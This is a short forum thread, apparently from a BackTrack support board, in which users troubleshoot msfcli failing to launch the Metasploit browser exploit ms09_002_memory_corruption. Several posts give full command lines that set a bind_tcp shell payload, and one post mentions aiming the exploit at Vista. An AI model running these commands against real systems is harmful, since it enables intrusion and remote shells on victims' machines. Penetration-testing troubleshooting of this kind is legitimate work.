Results 1 to 9 of 9

Thread: msfcli cannot load "listening" exploit?

Hybrid View

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    68

    Default msfcli cannot load "listening" exploit?

    Hi,

    This seems more of a metasploit issue than a bt4b issue, but thought I should post here anyway.

    I am running bt4b installed in VMWare (note, I am not using the proper VMWare image becuase my version of vmware workstation is out of date).

    The problem:

    Trying to launch any exploit via msfcli that uses a "listening" exploit, (I.E the majority of client-side browser exploits), msfcli just fails as below (no errors), however running the same exploit with same parameters in msfconsole works and the exploit is launched and ready for a connection.


    msfcli
    root@bt:/pentest/exploits/framework3# ./msfcli exploit/windows/browser/ms09_002_memory_corruption SRVPORT=80 URIPATH=test PAYLOAD=windows/shell/bind_tcp LPORT=4444 E

    root@bt:/pentest/exploits/framework3#


    msfconsole
    msf exploit(ms09_002_memory_corruption) > exploit
    [*] Exploit running as background job.

    msf exploit(ms09_002_memory_corruption) >
    [*] Started bind handler
    [*] Using URL: http://0.0.0.0:81/test
    [*] Local IP: http://10.0.0.232:81/test
    [*] Server started.

  2. #2
    Member
    Join Date
    Jun 2007
    Posts
    218

    Default

    Drop the exploit in your msfcli command.

    Have you had any success running that exploit against Vista?

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    68

    Default

    Quote Originally Posted by level View Post
    Drop the exploit in your msfcli command.

    Have you had any success running that exploit against Vista?
    not sure I understand what you mean by "drop"?

    If I remember correctly, Vista SP0 is a supported target but I don't have any Vista "disposable" machines at present.

  4. #4
    Member
    Join Date
    Jun 2007
    Posts
    218

    Default

    I mean use the command without 'exploit'

    ./msfcli /windows/browser/ms09_002_memory_corruption SRVPORT=80 URIPATH=test PAYLOAD=windows/shell/bind_tcp LPORT=4444

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Posts
    68

    Default

    Quote Originally Posted by level View Post
    I mean use the command without 'exploit'

    ./msfcli /windows/browser/ms09_002_memory_corruption SRVPORT=80 URIPATH=test PAYLOAD=windows/shell/bind_tcp LPORT=4444
    Thanks for the suggestion but msfcli complains that it is an invalid module if dropping the "exploit" part.

  6. #6
    Member
    Join Date
    Jun 2007
    Posts
    218

    Default

    Originally posted by bruk0ut
    Thanks for the suggestion but msfcli complains that it is an invalid module if dropping the "exploit" part.
    It works fine for me without 'exploit'. Did you download the module from the website?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •